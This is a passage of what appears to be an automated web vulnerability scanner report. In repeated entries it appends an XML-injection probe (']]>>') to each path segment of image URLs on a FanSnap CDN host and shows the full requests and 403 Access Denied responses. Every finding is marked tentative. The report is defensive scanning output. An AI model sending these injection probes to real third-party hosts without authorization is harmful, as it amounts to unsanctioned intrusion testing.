GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 22D3974817464B94
x-amz-id-2: MuXQRZEZuN2tNPYsSwU/A4FyGXaxsfNSJOjRKTEvn4XnhaE734E7Yitze4oNXGlJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ed72bf77c824a9fc4e68791c95d50821b2aeeb12af99f6f046d8ceb9fe4b0dc7c34551436e2b1385
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>22D3974817464B94</RequestId><HostId>MuXQRZEZuN2tNPYsSwU/A4FyGXaxsfNSJOjRKTEvn4XnhaE734
...[SNIP]...

8.147. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: CFD4206E8E4DD43C
x-amz-id-2: b/FHp0t9zQldso7ZWtV61scVGNtN9ksp4WW2QBSW5b6NeLUdgYSwvw5bfXeQZ7jv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: db08299a5dc1b2b2ff87de9bf3db18f6848a0964cc466ac2fcf299651385bae9ca3372015aa7bd49
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CFD4206E8E4DD43C</RequestId><HostId>b/FHp0t9zQldso7ZWtV61scVGNtN9ksp4WW2QBSW5b6NeLUdgY
...[SNIP]...

8.148. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4BBB83BE883B3E40
x-amz-id-2: Uy0Cy08+SY9BvOZp2+nW1uGmjKvchFW2ve1gAmib68nYWqORAGVMUKIWU5rG9Nd+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a23a4fd666dc3ffb54ec1391159ee3f65626a7963e75ccd14a58d1d8f14505c7ba588521fb4d5ee4
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4BBB83BE883B3E40</RequestId><HostId>Uy0Cy08+SY9BvOZp2+nW1uGmjKvchFW2ve1gAmib68nYWqORAG
...[SNIP]...

8.149. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 77C1298B25B1D238
x-amz-id-2: CwAAl2b+pAEiOavz/gJQHBHEBkzWzCCe0fJKLvRX9b4Bo79Q8HY326MnY77hMj/i
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:11 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ffaca7834ca7c8dc2906c3c7270bf73256ee51d7a4ea765b7e67bc1c2b8980b66249a28736f8d4d3
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>77C1298B25B1D238</RequestId><HostId>CwAAl2b+pAEiOavz/gJQHBHEBkzWzCCe0fJKLvRX9b4Bo79Q8H
...[SNIP]...

8.150. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3D91D14FC866CCA4
x-amz-id-2: OEHikW4GL6N8QsWAxmvli47Ljpmh5c1LjadYJom9JZvOyD/7tUuAABfjxU3D8AQx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a471e5a07b4231172ee4cc3191cb48a497b925369dc1946a56bab09e33f9ceda0502d882592f1765
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3D91D14FC866CCA4</RequestId><HostId>OEHikW4GL6N8QsWAxmvli47Ljpmh5c1LjadYJom9JZvOyD/7tU
...[SNIP]...

8.151. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 17AE0B9B09C750DD
x-amz-id-2: XJV/JWFk+jtQdl9w+k0oL5UksLe5FYLxPiMCzih/YDXqDIAt/ubJzb85VsHloT+t
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 018cecdc8bc42a9e5b011004028014cd0258ce09e62bb56cf6a2e2a0c80e3af8f7e7f86ddb34c899
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>17AE0B9B09C750DD</RequestId><HostId>XJV/JWFk+jtQdl9w+k0oL5UksLe5FYLxPiMCzih/YDXqDIAt/u
...[SNIP]...

8.152. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 35102CA8C8EDB502
x-amz-id-2: pVMv7gZRZ0/Wm4CAvPqg4fB4Mr1AyZwKmEYoN9RbuDFtdnA0WQt1I1kC68zurDhi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b1673324f297eb25e1120621e2ec2a54fb7e2704ee6cb7688b7e33b296069579f58c83366ada742
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>35102CA8C8EDB502</RequestId><HostId>pVMv7gZRZ0/Wm4CAvPqg4fB4Mr1AyZwKmEYoN9RbuDFtdnA0WQ
...[SNIP]...

8.153. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D897AE5604A6D968
x-amz-id-2: S3gThptg8QIhd9AqXGYW8nncinIgMedys7Nx0hz/W7BkTF+gBv3VV2rihN8V+Qgp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 03d1aa36ce75b478e1a7282d5c45f91cdb6f86c4b2cff99ef3867b00973ef2a11dcd625b1870a4bf
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D897AE5604A6D968</RequestId><HostId>S3gThptg8QIhd9AqXGYW8nncinIgMedys7Nx0hz/W7BkTF+gBv
...[SNIP]...

8.154. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2EC993ACC696A1D7
x-amz-id-2: H93NZFEbC6HdNR8UFlRrnU96JSf5HBUK0WO6vIgKkfHMGpmAtY1uhSTAgk0bzMpi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 844510d172ecc0207ea710acc638e3647da0a80567425a3e31e7b8c7c9e3964f4add950307b9a0f2
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2EC993ACC696A1D7</RequestId><HostId>H93NZFEbC6HdNR8UFlRrnU96JSf5HBUK0WO6vIgKkfHMGpmAtY
...[SNIP]...

8.155. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 472A15C34A39FB0B
x-amz-id-2: OlslQgvWjKFBRq9BdvHd56HJzySyZGWWaZstrTIHEXeVZ5EAhBoASCnRD0EnLkUA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9c8ba9be772642463299b891d389dbdb35622ec2cd6a926ce2bf57d32e11da353668bc351a945d44
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>472A15C34A39FB0B</RequestId><HostId>OlslQgvWjKFBRq9BdvHd56HJzySyZGWWaZstrTIHEXeVZ5EAhB
...[SNIP]...

8.156. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff6633-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0881DECEFF89E695
x-amz-id-2: t0qNXRQpY2La5d9yFs4+dI5ZXzRYgtgfpHd0ZW1sPH2fXEUOGUSGHioaklfAFMGl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 655afc9c6a5bd3fa331f71c35dbee3d08237b51cb9048725f4ee2803f3431a02c63f6fe56d92dc37
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0881DECEFF89E695</RequestId><HostId>t0qNXRQpY2La5d9yFs4+dI5ZXzRYgtgfpHd0ZW1sPH2fXEUOGU
...[SNIP]...

8.157. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 18B4685D33F69724
x-amz-id-2: 0GZh9uS1h3f+px7ikq0UVvyEPYkiXWbTYLTIxdRBysZfWjqI0+j0Imh6FDhYrMg8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d105d6cd4410cbca94ddd56cee181c5ae2c11278e77a0c70ea2e093b89ebb24ee901d4f22573cb5f
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>18B4685D33F69724</RequestId><HostId>0GZh9uS1h3f+px7ikq0UVvyEPYkiXWbTYLTIxdRBysZfWjqI0+
...[SNIP]...

8.158. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D797BF4792112964
x-amz-id-2: QFwxlGGMGJlNabHBpkAvHYQy5z9kHC//cuuZyzGGlb+T4seF6bmLVQgOcJMI2SxK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8faa1d0e4730daae81b378f73bf1da67f82bc666c3b810aadb6457fe146ec0582ee6ef6d33f115a7
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D797BF4792112964</RequestId><HostId>QFwxlGGMGJlNabHBpkAvHYQy5z9kHC//cuuZyzGGlb+T4seF6b
...[SNIP]...

8.159. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

